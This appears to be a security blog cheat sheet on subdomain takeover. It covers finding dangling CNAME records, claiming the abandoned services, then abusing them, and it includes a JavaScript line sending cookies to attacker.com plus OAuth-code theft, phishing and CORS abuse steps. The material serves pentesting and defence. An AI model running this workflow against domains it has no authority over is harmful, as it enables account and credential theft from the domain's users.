KagisoSec_
Web
WEB

Subdomain Takeover

Subdomain takeover: detect dangling DNS records (CNAME pointing to unclaimed services), claim the target, host malicious content, and chain to cookie theft, OAuth, and phishing. Full discovery and exploitation workflow.

web subdomain-takeover dns recon oauth xss

What is Subdomain Takeover

A subdomain takeover occurs when:

  1. sub.victim.com has a CNAME pointing to a third-party service (e.g., victim.github.io, victim.s3.amazonaws.com).
  2. The victim stopped using that third-party service but did not remove the DNS CNAME.
  3. An attacker claims that third-party service name (creates a GitHub Pages repo named victim, claims the S3 bucket, etc.).
  4. Now sub.victim.com resolves to content the attacker controls.

Detection

Step 1 — Enumerate subdomains

# Subfinder (passive)
subfinder -d victim.com -o subdomains.txt

# Amass (active + passive)
amass enum -d victim.com -o amass_out.txt

# DNS brute force
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
     -u https://FUZZ.victim.com -fs 0

# Certificate transparency
curl -s "https://crt.sh/?q=%.victim.com&output=json" | jq -r '.[].name_value' | sort -u

Step 2 — Check for dangling CNAMEs

# For each subdomain, check the CNAME and whether it resolves to a live service
for sub in $(cat subdomains.txt); do
  cname=$(dig +short CNAME $sub)
  if [ -n "$cname" ]; then
    echo "$sub -> $cname"
    # Check if the CNAME target actually exists
    ip=$(dig +short $cname)
    [ -z "$ip" ] && echo "  [!] DANGLING: $cname does not resolve"
  fi
done

Step 3 — Identify vulnerable service

When you find a dangling CNAME, visit the URL. The error message often reveals which service it pointed to:

Error messageService
There isn't a GitHub Pages site hereGitHub Pages
NoSuchBucketAWS S3
404 Not Found (Heroku header)Heroku
This domain isn't connected to a storeShopify
No such appAzure/Heroku
This site can't be reached (with SRV/MX record)Email provider

Step 4 — Automated check with nuclei

nuclei -l subdomains.txt -t ~/nuclei-templates/takeovers/ -o takeover-results.txt

Vulnerable Services Reference

ServiceTakeover method
GitHub PagesCreate repo matching the CNAME target
AWS S3Create bucket with the exact CNAME name in the correct region
Azure App ServiceCreate App Service with the matching name
HerokuCreate a Heroku app with the matching name
FastlyClaim the hostname in your Fastly account
NetlifyClaim in Netlify with custom domain matching the CNAME
CargoCreate a new site at the matching Cargo name
ShopifyCreate a store with the matching subdomain

Exploitation

Step 1 — Claim the service

Example for GitHub Pages:

  1. Create a GitHub repo named exactly what the CNAME points to (e.g., victim for victim.github.io).
  2. Enable GitHub Pages in the repo settings.
  3. Visit sub.victim.com — it now serves your content.

Step 2 — Serve malicious content

Once you control the subdomain, you can:

// If victim.com sets cookies for .victim.com
// sub.victim.com can read them
document.location = 'https://attacker.com/steal?cookie=' + document.cookie;

XSS delivery

Host an XSS payload accessible at sub.victim.com/payload.js:

<script src="https://sub.victim.com/payload.js"></script>

If the main application loads any JS from subdomains → XSS.

OAuth token theft

If the OAuth redirect_uri allows any subdomain of victim.com:

redirect_uri=https://sub.victim.com/callback

User authenticates → OAuth server redirects auth code to your controlled subdomain.

Phishing

Host a fake login page at mail.victim.com or login.victim.com — users trust the subdomain.

CORS bypass

If the main app has Access-Control-Allow-Origin: *.victim.com → your controlled subdomain can make authenticated cross-origin requests.

Tools

# SubOver — checks takeover potential
git clone https://github.com/Ice3man543/SubOver
./SubOver -l subdomains.txt

# Can-I-Take-Over-XYZ — reference list of vulnerable fingerprints
# https://github.com/EdOverflow/can-i-take-over-xyz

# Subjack
./subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl

Burp Suite workflow

  1. Proxy — intercept responses from target subdomains; note CNAME headers or error messages.
  2. Use Burp’s Target → Scope to map all subdomains discovered during recon.
  3. Collaborator — verify DNS resolution of dangling subdomains.
  4. After claiming a subdomain, test cookie scope, CORS origin, and OAuth redirect_uri from the new subdomain.